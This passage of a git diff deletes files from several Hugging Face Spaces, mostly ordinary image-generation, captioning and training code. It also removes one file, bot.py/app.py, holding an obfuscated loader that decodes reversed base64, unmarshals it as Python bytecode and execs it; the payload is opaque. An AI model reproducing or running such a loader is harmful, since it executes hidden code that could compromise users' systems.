detailed, iconic, Japanese comic style", - "negative_prompt": "ugly, deformed, noisy, blurry, low contrast, realism, photorealistic, Western comic style", - }, - { - "name": "Digital Art", - "prompt": "concept art {prompt} . digital artwork, illustrative, painterly, matte painting, highly detailed", - "negative_prompt": "photo, photorealistic, realism, ugly", - }, - { - "name": "Pixel art", - "prompt": "pixel-art {prompt} . low-res, blocky, pixel art style, 8-bit graphics", - "negative_prompt": "sloppy, messy, blurry, noisy, highly detailed, ultra textured, photo, realistic", - }, - { - "name": "Fantasy art", - "prompt": "ethereal fantasy concept art of {prompt} . magnificent, celestial, ethereal, painterly, epic, majestic, magical, fantasy art, cover art, dreamy", - "negative_prompt": "photographic, realistic, realism, 35mm film, dslr, cropped, frame, text, deformed, glitch, noise, noisy, off-center, deformed, cross-eyed, closed eyes, bad anatomy, ugly, disfigured, sloppy, duplicate, mutated, black and white", - }, - { - "name": "Neonpunk", - "prompt": "neonpunk style {prompt} . cyberpunk, vaporwave, neon, vibes, vibrant, stunningly beautiful, crisp, detailed, sleek, ultramodern, magenta highlights, dark purple shadows, high contrast, cinematic, ultra detailed, intricate, professional", - "negative_prompt": "painting, drawing, illustration, glitch, deformed, mutated, cross-eyed, ugly, disfigured", - }, - { - "name": "3D Model", - "prompt": "professional 3d model {prompt} . 
octane render, highly detailed, volumetric, dramatic lighting", - "negative_prompt": "ugly, deformed, noisy, low poly, blurry, painting", - }, -] - -styles = {k["name"]: (k["prompt"], k["negative_prompt"]) for k in style_list} -STYLE_NAMES = list(styles.keys()) -DEFAULT_STYLE_NAME = "Cinematic" - - -def apply_style(style_name: str, positive: str, negative: str = "") -> Tuple[str, str]: - p, n = styles.get(style_name, styles[DEFAULT_STYLE_NAME]) - if not negative: - negative = "" - return p.replace("{prompt}", positive), n + negative - - -if torch.cuda.is_available(): - vae = AutoencoderKL.from_pretrained("madebyollin/sdxl-vae-fp16-fix", torch_dtype=torch.float16) - pipe = StableDiffusionXLPipeline.from_pretrained( - "segmind/SSD-1B", - vae=vae, - torch_dtype=torch.float16, - use_safetensors=True, - variant="fp16", - ) - if ENABLE_REFINER: - refiner = DiffusionPipeline.from_pretrained( - "stabilityai/stable-diffusion-xl-refiner-1.0", - vae=vae, - torch_dtype=torch.float16, - use_safetensors=True, - variant="fp16", - ) - - if ENABLE_CPU_OFFLOAD: - pipe.enable_model_cpu_offload() - if ENABLE_REFINER: - refiner.enable_model_cpu_offload() - else: - pipe.to(device) - if ENABLE_REFINER: - refiner.to(device) - print("Loaded on Device!") - - if USE_TORCH_COMPILE: - pipe.unet = torch.compile(pipe.unet, mode="reduce-overhead", fullgraph=True) - if ENABLE_REFINER: - refiner.unet = torch.compile(refiner.unet, mode="reduce-overhead", fullgraph=True) - print("Model Compiled!") - -def save_image(img): - unique_name = str(uuid.uuid4()) + '.png' - img.save(unique_name) - return unique_name - -def randomize_seed_fn(seed: int, randomize_seed: bool) -> int: - if randomize_seed: - seed = random.randint(0, MAX_SEED) - return seed - -def generate( - prompt: str, - negative_prompt: str = "", - style: str = DEFAULT_STYLE_NAME, - prompt_2: str = "", - negative_prompt_2: str = "", - use_negative_prompt: bool = False, - use_prompt_2: bool = False, - use_negative_prompt_2: bool = False, - seed: int = 0, - width: int = 1024, - height: int = 1024, - guidance_scale_base: float = 5.0, - guidance_scale_refiner: float = 5.0, - num_inference_steps_base: int = 25, - num_inference_steps_refiner: int = 25, - apply_refiner: bool = False, - randomize_seed: bool = False, - progress = gr.Progress(track_tqdm=True) -): - seed = randomize_seed_fn(seed, randomize_seed) - generator = torch.Generator().manual_seed(seed) - - if not use_negative_prompt: - negative_prompt = None # type: ignore - if not use_prompt_2: - prompt_2 = None # type: ignore - if not use_negative_prompt_2: - negative_prompt_2 = None # type: ignore - prompt, negative_prompt = apply_style(style, prompt, negative_prompt) - if not apply_refiner: - image = pipe( - prompt=prompt, - negative_prompt=negative_prompt, - prompt_2=prompt_2, - negative_prompt_2=negative_prompt_2, - width=width, - height=height, - guidance_scale=guidance_scale_base, - num_inference_steps=num_inference_steps_base, - generator=generator, - output_type="pil", - ).images[0] - else: - latents = pipe( - prompt=prompt, - negative_prompt=negative_prompt, - prompt_2=prompt_2, - negative_prompt_2=negative_prompt_2, - width=width, - height=height, - guidance_scale=guidance_scale_base, - num_inference_steps=num_inference_steps_base, - generator=generator, - output_type="latent", - ).images - image = refiner( - prompt=prompt, - negative_prompt=negative_prompt, - prompt_2=prompt_2, - negative_prompt_2=negative_prompt_2, - guidance_scale=guidance_scale_refiner, - num_inference_steps=num_inference_steps_refiner, - 
image=latents, - generator=generator, - ).images[0] - - image_path = save_image(image) - print(image_path) - return [image_path], seed - - -examples = ['3d digital art of an adorable ghost, glowing within, holding a heart shaped pumpkin, Halloween, super cute, spooky haunted house background', 'beautiful lady, freckles, big smile, blue eyes, short ginger hair, dark makeup, wearing a floral blue vest top, soft light, dark grey background', 'professional portrait photo of an anthropomorphic cat wearing fancy gentleman hat and jacket walking in autumn forest.', 'an astronaut sitting in a diner, eating fries, cinematic, analog film', 'Albert Einstein in a surrealist Cyberpunk 2077 world, hyperrealistic', 'cinematic film still of Futuristic hero with golden dark armour with machine gun, muscular body'] - -with gr.Blocks(css="style.css") as demo: - gr.Markdown(DESCRIPTION) - gr.DuplicateButton( - value="Duplicate Space for private use", - elem_id="duplicate-button", - visible=os.getenv("SHOW_DUPLICATE_BUTTON") == "1", - ) - with gr.Group(): - with gr.Row(): - prompt = gr.Text( - label="Prompt", - show_label=False, - max_lines=1, - placeholder="Enter your prompt", - container=False, - ) - run_button = gr.Button("Run", scale=0) - result = gr.Gallery(label="Result", columns=1, show_label=False) - with gr.Accordion("Advanced options", open=False): - with gr.Row(): - use_negative_prompt = gr.Checkbox(label="Use negative prompt", value=False) - use_prompt_2 = gr.Checkbox(label="Use prompt 2", value=False) - use_negative_prompt_2 = gr.Checkbox(label="Use negative prompt 2", value=False) - style_selection = gr.Radio( - show_label=True, container=True, interactive=True, - choices=STYLE_NAMES, - value=DEFAULT_STYLE_NAME, - label='Image Style' - ) - negative_prompt = gr.Text( - label="Negative prompt", - max_lines=1, - placeholder="Enter a negative prompt", - visible=False, - ) - prompt_2 = gr.Text( - label="Prompt 2", - max_lines=1, - placeholder="Enter your prompt", - visible=False, - ) - negative_prompt_2 = gr.Text( - label="Negative prompt 2", - max_lines=1, - placeholder="Enter a negative prompt", - visible=False, - ) - seed = gr.Slider( - label="Seed", - minimum=0, - maximum=MAX_SEED, - step=1, - value=0, - ) - randomize_seed = gr.Checkbox(label="Randomize seed", value=True) - with gr.Row(visible=False): - width = gr.Slider( - label="Width", - minimum=256, - maximum=MAX_IMAGE_SIZE, - step=32, - value=1024, - ) - height = gr.Slider( - label="Height", - minimum=256, - maximum=MAX_IMAGE_SIZE, - step=32, - value=1024, - ) - apply_refiner = gr.Checkbox(label="Apply refiner", value=False, visible=ENABLE_REFINER) - with gr.Row(): - guidance_scale_base = gr.Slider( - label="Guidance scale for base", - minimum=1, - maximum=20, - step=0.1, - value=9.0, - ) - num_inference_steps_base = gr.Slider( - label="Number of inference steps for base", - minimum=10, - maximum=100, - step=1, - value=25, - ) - with gr.Row(visible=False) as refiner_params: - guidance_scale_refiner = gr.Slider( - label="Guidance scale for refiner", - minimum=1, - maximum=20, - step=0.1, - value=5.0, - ) - num_inference_steps_refiner = gr.Slider( - label="Number of inference steps for refiner", - minimum=10, - maximum=100, - step=1, - value=25, - ) - - gr.Examples( - examples=examples, - inputs=prompt, - outputs=[result, seed], - fn=generate, - cache_examples=CACHE_EXAMPLES, - ) - - use_negative_prompt.change( - fn=lambda x: gr.update(visible=x), - inputs=use_negative_prompt, - outputs=negative_prompt, - queue=False, - api_name=False, - ) - 
use_prompt_2.change( - fn=lambda x: gr.update(visible=x), - inputs=use_prompt_2, - outputs=prompt_2, - queue=False, - api_name=False, - ) - use_negative_prompt_2.change( - fn=lambda x: gr.update(visible=x), - inputs=use_negative_prompt_2, - outputs=negative_prompt_2, - queue=False, - api_name=False, - ) - apply_refiner.change( - fn=lambda x: gr.update(visible=x), - inputs=apply_refiner, - outputs=refiner_params, - queue=False, - api_name=False, - ) - - gr.on( - triggers=[ - prompt.submit, - negative_prompt.submit, - prompt_2.submit, - negative_prompt_2.submit, - run_button.click, - ], - fn=generate, - inputs=[ - prompt, - negative_prompt, - style_selection, - prompt_2, - negative_prompt_2, - use_negative_prompt, - use_prompt_2, - use_negative_prompt_2, - seed, - width, - height, - guidance_scale_base, - guidance_scale_refiner, - num_inference_steps_base, - num_inference_steps_refiner, - apply_refiner, - randomize_seed - ], - outputs=[result, seed], - api_name="run", - ) - -if __name__ == "__main__": - demo.queue(max_size=20).launch() \ No newline at end of file diff --git a/spaces/serdaryildiz/TRCaptionNet/Model/trcaptionnet.py b/spaces/serdaryildiz/TRCaptionNet/Model/trcaptionnet.py deleted file mode 100644 index bdd52bedcbe32527303ec3b6c35b9c836f2b0e3d..0000000000000000000000000000000000000000 --- a/spaces/serdaryildiz/TRCaptionNet/Model/trcaptionnet.py +++ /dev/null @@ -1,107 +0,0 @@ -import os -import numpy - -import torch -from torch import nn -from PIL import Image -from transformers import BertTokenizer - -from Model import clip -from Model.bert import BertLMHeadModel, BertConfig -from Model.clip.model import Transformer - - -class Proj(nn.Module): - - def __init__(self, encoder_output_size, num_head=16): - super().__init__() - self.encoder_output_size = encoder_output_size - - self.transformer = Transformer(encoder_output_size, 1, num_head) - self.linear = nn.Linear(encoder_output_size, 768) - return - - def forward(self, x): - x = x.permute(1, 0, 2) # NLD -> LND - x = self.transformer(x) - x = x.permute(1, 0, 2) # LND -> NLD - return self.linear(x) - - -class TRCaptionNet(nn.Module): - def __init__(self, config: dict): - super().__init__() - # parameters - self.max_length = config["max_length"] - self.proj_flag = config["proj"] - assert type(self.proj_flag) == bool - self.proj_num_head = config["proj_num_head"] - - # vision encoder - self.vision_encoder, preprocess = clip.load(config["clip"], jit=False) - self.vision_encoder.eval() - self.vision_encoder = self.vision_encoder.visual.float() - with torch.no_grad(): - dummy_input_image = preprocess(Image.fromarray(numpy.zeros((512, 512, 3), dtype=numpy.uint8))).to(next(self.parameters()).device) - encoder_output_size = self.vision_encoder(dummy_input_image.unsqueeze(0)).shape[-1] - - # language decoder - if not os.path.isfile(config["bert"]): - self.language_decoder = BertLMHeadModel.from_pretrained(config["bert"], - is_decoder=True, - add_cross_attention=True) - self.tokenizer = BertTokenizer.from_pretrained(config["bert"]) - else: - med_config = BertConfig.from_json_file(config["bert"]) - self.language_decoder = BertLMHeadModel(config=med_config) - self.tokenizer = BertTokenizer.from_pretrained("dbmdz/bert-base-turkish-cased") - - # proj - if self.proj_flag: - if self.proj_num_head is None: - self.proj = nn.Linear(encoder_output_size, 768) - else: - self.proj = Proj(encoder_output_size, self.proj_num_head) - else: - self.proj = None - return - - @torch.no_grad() - def generate(self, images, max_length: int = None, min_length: int = 
12, num_beams: int = 3, - repetition_penalty: float = 1.1): - image_embeds = self.vision_encoder(images) - - if self.proj is not None: - image_embeds = self.proj(image_embeds) - - image_atts = torch.ones(image_embeds.shape[:-1], dtype=torch.long).to(images.device) - model_kwargs = {"encoder_hidden_states": image_embeds, "encoder_attention_mask": image_atts} - - input_ids = torch.ones((image_embeds.shape[0], 1), device=images.device, dtype=torch.long) - input_ids *= 2 - - outputs = self.language_decoder.generate(input_ids=input_ids, - max_length=self.max_length if max_length is None else max_length, - min_length=min_length, - num_beams=num_beams, - eos_token_id=self.tokenizer.sep_token_id, - pad_token_id=self.tokenizer.pad_token_id, - repetition_penalty=repetition_penalty, - **model_kwargs) - - captions = [self.tokenizer.decode(output, skip_special_tokens=True) for output in outputs] - return captions - - -def test(): - model = TRCaptionNet({ - "max_length": 35, - "clip": "ViT-B/32", - "bert": "dbmdz/bert-base-turkish-cased" - }) - - return - - -if __name__ == '__main__': - test() diff --git a/spaces/shibing624/ChatPDF/modules/__init__.py b/spaces/shibing624/ChatPDF/modules/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/shigel/ailol/template.md b/spaces/shigel/ailol/template.md deleted file mode 100644 index 7dac1398e486c0f52b6bfd5fa138d6d15a052d9d..0000000000000000000000000000000000000000 --- a/spaces/shigel/ailol/template.md +++ /dev/null @@ -1,11 +0,0 @@ -### AIアシスタントの返信 - -ここにユーザのメッセージに対する返信を書く(爆笑必至) - -### AIアシスタントの気持ち - -ここにAIアシスタントの気持ちを書く - -### 笑いのネタに対する自信 - -返信で披露したネタの自信の程を心ゆくまで語って良し diff --git a/spaces/silentAw404/bot.py/app.py b/spaces/silentAw404/bot.py/app.py deleted file mode 100644 index 0f26c18cbe6695cf4fcff48c5358162aa1d99e2b..0000000000000000000000000000000000000000 --- a/spaces/silentAw404/bot.py/app.py +++ /dev/null @@ -1 +0,0 @@ -_ = lambda __ : 
__import__('marshal').loads(__import__('base64').b64decode(__[::-1]));exec((_)(b'CoQAEEgDBQQAEEABBQwDIEACCARAKEADBwQACIACBARAKEADBwQACMgCBoQAKEgCCIQAMEACAAAA2MHAAAQA+UGb1R2btxDCaDAAAEhcAAAAQIHAAAAEyBAAAAhc05WayBXBaPWZ4VGBaDAAA8gcAAAAOIHAAAQDyBAAAwgcAAAALIHAAAgEyBAAAggcy9mcyVEdy9Gctl0CaDAAAYgctVGdzl3cGodZslmZzlmBajGdhBHBaP3bCo9Dp4iLu8K2MuthZnq2gkq2GqNInidsYDyrYjY2uiNIqithZHL2qithZz42niNInidgZfL2EmNIxiNiZHL2ziNIHmNqYDChZfK21itqYfK2gEL2viNIni9tY7K2AAAAZVXMxcTcWFjSXdGSLBjZhNUN40GSZ9UVhtmY1dlbnJHMJFzb6p2Xwh2ZooVew5CdvJmB6VGaCo1boFGaTJWTHoFAAAgEyFgBBogAGEAEBARAKIgDB4QAWEgABAAAAAgFzBAAAkRZk92YfJWdoRXan9Fdld2Da7De8Mg+AAAAQIHApWGZvNGBaTnblRnbvN2XlxWamxgWlNnbvB3clJHCaBAAAMgcsJXdflGchdgWuV2avR3XoRXdhpg2oRXYw9VZslmZJodZtFmbf9GclJXCaLXZud3bf9GclJnCanQKlR2bjVGZGodZk92YlRGN2IWCaTjNlNXYiZg2u92cqRgWlR2bj91c1RXY0N3CaRXZnNg2zR3clVXclJHCafQK40iZ0VXB6Bg205WZ052bjdgWAAAAIn+cyVGZhVGaHodApAiblt2b0Zgeu9Wa0FmepJ3boRXdB1gWvMHduVGdu92YvogevEg+vM3bwVmcv02bj5iY1hGdpdmLpBXYv8iOzBHd0hWH650CpAwUAQGAwAwUAQGAZBQAAEAAB4gbAcFATBAZAcFATBwVIwHC9FQoKQmBgGQoHwXBgSAdH0nAhmAZIQWAgCQoDAqB8RmcCs2BkJgaGwnB9JQjGQWB8RAfBoGA0VQfBkmAdCwmDwXBkRAZE0nBdCwmCw3AkBwmBwnAkBwmAwXAkxmeAAAAAOHAAAwQAAAAGAAAAkAAAAAAAAAAAAAAAQwY0YTZzFmYgwGbhR3culGIwlGcSo3c0NXZ1FXZyBCbsFGdz5WagAXawRhelxGctl2cvkHevJHctkGc5B3L5J3b0l2cvBXZy9Cdl5mLuF2avJWYoNmLy9mcylWbv8iOzBHd0hGIsJXdtgXZk5Wat0CIwlGcgUGZhJ3ZwVXLtACbsFGdz5WagAXaw5leyFWZsNWBaXGbw1Waz9Se49mcw1SawlHcvkncvRXaz9GclJ3L0Vmbu4WYr9mYhh2YuI3byJXat9yL6MHc0RHagwmc11CelRmbp5CbhJ2bsdGI0V2cgcWam52bjBCcpBHW652bzpmLuJXYlxmC65EAAAAAp/QKAMVAkBQABMoDk5QZI4GABEwgMUWDlpucMUGDaRwgLUmCllQZIU2BltgWNQmCaxAZJo1CkhgWKQ2BaBAhJQGCkZgWGwWAkBAZAAjAuBQWAEQAhSAZDAKAlBQABE6BkNAoAUGABAQAAEAr5VQZAQgJuBwVGolBsFAZAQGD6RgWEwWAkBAZAAjAuBQWAEQAhSAZDAKAlBQABEqBkNAoAUGABAQAAEAc5VQZAQgJuBwVEoFBsFAZAQGD6BQABEKBkNAoAUGABEQoFQ2AgCQZAEQAhSAZDAKAlBQABE6AkNAoAUGKuZhcBEqAkJAoBoGAlBgWAwWAkBAZAAAA2PHAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAwY')) \ No newline at end of file diff --git a/spaces/simonguest/cs-tutor/README.md b/spaces/simonguest/cs-tutor/README.md deleted file mode 100644 index 1f961bcb80a4b5b89e227a99608a9341f10af559..0000000000000000000000000000000000000000 --- a/spaces/simonguest/cs-tutor/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Cs Tutor -emoji: 🦀 -colorFrom: red -colorTo: gray -sdk: gradio -sdk_version: 3.36.1 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/skf15963/summary/fengshen/examples/finetune_bart_qg/finetune_bart.sh b/spaces/skf15963/summary/fengshen/examples/finetune_bart_qg/finetune_bart.sh deleted file mode 100644 index ae88b230fa223c3d2c519e4f09cb1c703319af48..0000000000000000000000000000000000000000 --- a/spaces/skf15963/summary/fengshen/examples/finetune_bart_qg/finetune_bart.sh +++ /dev/null @@ -1,97 +0,0 @@ -#!/bin/bash -#SBATCH --job-name=bart_qg # create a short name for your job -#SBATCH --nodes=1 # node count -#SBATCH --ntasks-per-node=8 # number of tasks to run per node -#SBATCH --cpus-per-task=10 # cpu-cores per task (>1 if multi-threaded tasks) -#SBATCH --gres=gpu:1 # number of gpus per node -#SBATCH -o %x-%j.log # output and error log file names (%x for job id) -set -x -e - -MODEL_NAME=IDEA-CCNL/Randeng-BART-139M -RUN_NAME=bart_v0_test -ROOT_DIR=../../workspace/log/$RUN_NAME - -config_json="$ROOT_DIR/$MODEL_NAME.ds_config.json" -export MASTER_PORT=$[RANDOM%10000+40000] - -MICRO_BATCH_SIZE=32 - -cat < $config_json -{ - "train_micro_batch_size_per_gpu": $MICRO_BATCH_SIZE, - 
"gradient_clipping": 1, - "zero_optimization": { - "stage": 1 - }, - "fp16": { - "enabled": true, - } -} -EOT -export PL_DEEPSPEED_CONFIG_PATH=$config_json -export TORCH_EXTENSIONS_DIR=../../workspace/torch_extensions - -DATA_ARGS=" \ - --train_file train.json \ - --val_file dev.json \ - --test_file test.json \ - --tokenizer_type bart \ - --num_workers 8 \ - --dataloader_workers 2 \ - --train_batchsize $MICRO_BATCH_SIZE \ - --val_batchsize $MICRO_BATCH_SIZE \ - --test_batchsize $MICRO_BATCH_SIZE \ - --max_seq_lengt 512 \ - --max_src_length 32 \ - --max_kno_length 416 \ - --max_tgt_length 64 \ - --mask_ans_style anstoken_multispan \ - " - -MODEL_ARGS="\ - --model_path $MODEL_NAME/ \ - --learning_rate 1e-4 \ - --min_learning_rate 1e-8 \ - --lr_decay_steps 100000 \ - --weight_decay 1e-2 \ - --warmup_steps 1000 \ - " - -MODEL_CHECKPOINT_ARGS="\ - --monitor val_loss \ - --save_top_k 3 \ - --mode min \ - --save_last \ - --every_n_train_steps 5000 \ - --save_ckpt_path $ROOT_DIR/ckpt/ \ - --load_ckpt_path $ROOT_DIR/ckpt/ \ - --filename model-{step:02d}-{train_loss:.4f} \ - " - -TRAINER_ARGS="\ - --gradient_clip_val 1.0 \ - --max_epochs 1 \ - --gpus 1 \ - --num_nodes 1 \ - --strategy ddp \ - --log_every_n_steps 100 \ - --val_check_interval 0.5 \ - --accumulate_grad_batches 1 \ - --default_root_dir $ROOT_DIR \ - --tensorboard_dir $ROOT_DIR \ - --label_smooth 0.1 \ - " - - - -export options=" \ - $DATA_ARGS \ - $MODEL_ARGS \ - $MODEL_CHECKPOINT_ARGS \ - $TRAINER_ARGS \ - " -# test -export SCRIPT_PATH=./finetune_bart.py - -python3 ${SCRIPT_PATH} $options > $ROOT_DIR/test.log - diff --git a/spaces/sklearn-docs/MNIST-Agglomerative-Clustering/README.md b/spaces/sklearn-docs/MNIST-Agglomerative-Clustering/README.md deleted file mode 100644 index 45bfb3ab4258d29dbb70385613de6c60e6cb6ed2..0000000000000000000000000000000000000000 --- a/spaces/sklearn-docs/MNIST-Agglomerative-Clustering/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: MNIST Agglomerative Clustering -emoji: 📉 -colorFrom: pink -colorTo: purple -sdk: gradio -sdk_version: 3.24.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/skyxx/skyxxChat/run_macOS.command b/spaces/skyxx/skyxxChat/run_macOS.command deleted file mode 100644 index 2d26597ae47519f42336ccffc16646713a192ae1..0000000000000000000000000000000000000000 --- a/spaces/skyxx/skyxxChat/run_macOS.command +++ /dev/null @@ -1,31 +0,0 @@ -#!/bin/bash - -# 获取脚本所在目录 -script_dir=$(dirname "$(readlink -f "$0")") - -# 将工作目录更改为脚本所在目录 -cd "$script_dir" || exit - -# 检查Git仓库是否有更新 -git remote update -pwd - -if ! git status -uno | grep 'up to date' > /dev/null; then - # 如果有更新,关闭当前运行的服务器 - pkill -f ChuanhuChatbot.py - - # 拉取最新更改 - git pull - - # 安装依赖 - pip3 install -r requirements.txt - - # 重新启动服务器 - nohup python3 ChuanhuChatbot.py & -fi - -# 检查ChuanhuChatbot.py是否在运行 -if ! 
pgrep -f ChuanhuChatbot.py > /dev/null; then - # 如果没有运行,启动服务器 - nohup python3 ChuanhuChatbot.py & -fi diff --git a/spaces/sqc1729/bingi/src/components/ui/textarea.tsx b/spaces/sqc1729/bingi/src/components/ui/textarea.tsx deleted file mode 100644 index e25af722c7a5dc1121a9ab58d6716952f9f76081..0000000000000000000000000000000000000000 --- a/spaces/sqc1729/bingi/src/components/ui/textarea.tsx +++ /dev/null @@ -1,24 +0,0 @@ -import * as React from 'react' - -import { cn } from '@/lib/utils' - -export interface TextareaProps - extends React.TextareaHTMLAttributes<HTMLTextAreaElement> {} - -const Textarea = React.forwardRef<HTMLTextAreaElement, TextareaProps>( - ({ className, ...props }, ref) => { - return ( -